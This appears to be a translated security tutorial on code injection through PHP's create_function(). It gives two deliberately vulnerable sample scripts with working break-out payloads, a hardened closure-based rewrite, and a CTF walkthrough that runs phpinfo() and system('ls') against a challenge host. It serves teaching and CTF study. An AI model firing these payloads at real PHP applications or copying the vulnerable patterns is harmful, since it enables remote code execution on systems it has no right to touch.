0x00 create_function() Function Introduction
Scope: PHP 4 >= 4.0.1, PHP 5, PHP 7
Function: Creates an anonymous function from the parameters passed in and returns its unique name.
Syntax:
create_function ( string $args , string $code )
// string $args: the parameter declaration of the function
// string $code: the code that makes up the function body
0x01 Function Analysis
Example:
<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>
create_function() creates an anonymous function (lambda style).
Internally, create_function() executes the function through eval(). Looking at the implementation, the return statement that ends up in the function body is exactly the string $code passed as create_function()'s second argument.
Thus the create_function() call above is equivalent to:
<?php
function lambda1($a, $b) {
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>
0x03 Code Injection Cases
Case 1:
<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases = array('1234', '4321');
// user input is concatenated straight into the PHP source of the comparator
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>
Payload construction:
http://localhost/test/1.php?sort_by='"]);}phpinfo();/*
What the concatenation actually produces:
$sort_function = ' return 1 * strnatcasecmp($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
// with $sort_by = '"]);}phpinfo();/* the string becomes:
// return 1 * strnatcasecmp($a["'"]);}phpinfo();/*"], $b["'"]);}phpinfo();/*"]);
The anonymous function that actually gets defined:
function niming($a, $b) {
    return 1 * strnatcasecmp($a["'"]);
}
phpinfo();
/*"], $b["'"]);}phpinfo();/*"]);
}
The "}" closes the function body early, phpinfo() runs at definition time, and the "/*" comments out the rest of the generated source.
Case 2:
<?php
$c = $_GET['c'];
// $a and $b are escaped so that only $c is interpolated into the source string
$lambda = create_function('$a,$b', "return (strlen(\$a)-strlen(\$b)+" . "strlen($c));");
$array = array('reall long string here,boy', 'this', 'midding lenth', 'larget');
usort($array, $lambda);
print_r($array);
?>
Payload construction:
http://localhost/test/2.php?c=1));}phpinfo();/*
What the interpolation actually produces:
$lambda = create_function('$a,$b', "return (strlen(\$a)-strlen(\$b)+strlen(1));}phpinfo();/*));");
The anonymous function that actually gets defined:
function ft($a, $b) {
    return (strlen($a)-strlen($b)+strlen(1));
}
phpinfo();
/*));
}
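A hardened rewrite of Case 1 and Case 2, added here as an example (not code from the original post): the sort key is checked against an allow-list and the comparator is a real closure, so no request value is ever assembled into PHP source. The sample rows and the allow-list are constructed for the example.

```php
<?php
// Added example, not from the original post. Both comparators are closures;
// request input is used only as data, never as source text for eval().

// Constructed sample data with the two columns a caller may sort by.
$databases = [
    ['name' => 'zeta',  'owner' => 'bob'],
    ['name' => 'alpha', 'owner' => 'carol'],
    ['name' => 'Beta',  'owner' => 'alice'],
];

// Case 1: only these keys are ever used; anything else is rejected up front.
$allowed_sort_keys = ['name', 'owner'];

$sort_by = $_GET['sort_by'] ?? 'name';
if (!in_array($sort_by, $allowed_sort_keys, true)) {
    http_response_code(400);
    exit('invalid sort_by');
}

// $sort_by is captured as a plain string value and used as an array key;
// a value such as '"]);}phpinfo();/* simply fails the allow-list check above.
usort($databases, function (array $a, array $b) use ($sort_by): int {
    return strnatcasecmp($a[$sort_by], $b[$sort_by]);
});
print_r($databases);

// Case 2: the offset is cast to an integer and captured by the closure,
// so there is no string of code for a "));}" sequence to break out of.
$c = isset($_GET['c']) ? (int) $_GET['c'] : 0;
$words = ['reall long string here,boy', 'this', 'midding lenth', 'larget'];
usort($words, function (string $a, string $b) use ($c): int {
    return strlen($a) - strlen($b) + $c;
});
print_r($words);
```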
0x04 A create_function Code Injection in a CTF
Address: http://198.13.45.199:5007/
The page has two links; clicking the "don't click me" link jumps to a page that shows the PHP source: http://198.13.45.199:5007/index.php?source
The source calls create_function(), so there should be an injection point.
It is a GET request, so we only need to pass a code value; if ";" is enough to close the statement, the payload can be constructed.
Payload construction:
http://198.13.45.199:5007/index.php?code=1;}phpinfo();/*
The code executes successfully.
Use the system() function to run system commands:
Payload construction:
http://198.13.45.199:5007/index.php?code=1;}system(%27ls%20../../../%27);/*
Keep listing directories upward with ls until the file whose name contains the flag appears, then cat it to get the flag.
As of PHP 7.2.0, create_function() is deprecated.